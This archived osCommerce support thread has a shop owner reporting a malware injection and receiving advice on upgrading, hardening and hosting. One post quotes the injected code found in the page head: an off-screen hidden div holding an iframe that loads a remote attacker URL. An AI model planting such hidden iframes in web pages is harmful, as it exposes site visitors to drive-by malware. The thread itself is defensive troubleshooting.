Jump to content

Archived

This topic is now archived and is closed to further replies.

FranzderFranke

Maleware injection in OScommerce 2.2 RC

Recommended Posts

Hello,

 

Today i get a mail from google adwords, that i got maleware on my oscommerce 2.2 rc website. Some maleware checker told me the same.

I got this problem one year ago. That time i installed a old backup and lots of Secure Plugins - even a nice guy from The UK Waltons lookt over it.

 

Today i reinstalled a sql backup from yesterday and everything seems fine - Maleware Checker says its fine now, too.

 

But i don´t know what the problem was. No Data from the webspace was changed so it looks like a maleware injection into sql.

 

I did 99 % of this: http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/

 

 

I dont have much info about that maleware - Kaspersky told my : HEUR:Trojan Script.Generic / Adwords : Malware / Webmastertools: Nothing (but this don´t mean anything because they work slow)

 

What should i do now? Iam pretty sure this will happen again.

Share this post


Link to post
Share on other sites

You should upgrade your old version of osCommerce by nuking it and installing the latest stable version.


This is a signature that appears on all my posts.  
IF YOU MAKE A POST REQUESTING HELP...please state the exact version
of osCommerce that you are using. THANKS

 
Get the latest Responsive osCommerce CE (community edition) here

Share this post


Link to post
Share on other sites

You should upgrade your old version of osCommerce by nuking it and installing the latest stable version.

 

But then i have to start from beginning and i have lots of plugins for connection to merchandise management programms that dont work wiht new versions i think... :(

Share this post


Link to post
Share on other sites

 

It might be better to do 100%

 

Cheers

 

G


Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Share this post


Link to post
Share on other sites

Now i have more information about the iframe code injection:

 

8:< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
9:< !-- EOF: Header Tags SEO Generated Meta Tags -->
10:< base href="http://www.xxx.de/">
11:< link rel="stylesheet" type="text/css" href="stylesheet.css">
12:< /head> < style> .hlc4ygqt3 { position:absolute; left:-1174px; top:-1822px} < /style> < div class="hlc4ygqt3"> < if​rame src="http://ugrpcfr.hopto.org/zwtzzadbm8tsfklpbl9h3bg9am7pbdvmvy" width="153" height="363"> < /if​rame > < /div>
13:< body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
14:< !-- header //-->

 

Its only got listed by the bing robot.

 

btw. Did someone know if http://sitecheck3.sucuri.net/ Firewall is usefull?

Share this post


Link to post
Share on other sites

It doesn't matter what the code is. The important questions;

 

1. HOW did it get there.

2. WHAT can I do to stop it happening again.

 

 


This is a signature that appears on all my posts.  
IF YOU MAKE A POST REQUESTING HELP...please state the exact version
of osCommerce that you are using. THANKS

 
Get the latest Responsive osCommerce CE (community edition) here

Share this post


Link to post
Share on other sites

It more looks like an IE add-on. That thing with AdWords recently happened to wide variety of websites - request re-review.

Share this post


Link to post
Share on other sites

As 'burt' stated, the content of the hack code is not really important, but rather how the attacker was able to insert that code into a page on your website.

 

There are two usual methods, one is via a security hole in the web cart, which there are a few big ones in v2.2, or via a security hole in the webserver that the site is hosted on.

 

If you are intent on using v2.2, then after cleaning up your website you should install the osCSec addon.

 

http://addons.oscommerce.com/info/8929


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

The other point that needs to be stressed is that some shared hosting services are notorious for crap security on their servers. Luck of the draw you get a good one, many of the free hosting sites have little security and rely on suspending your free site rather than fixing their security issues, as their primary means of dealing with being hacked.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

×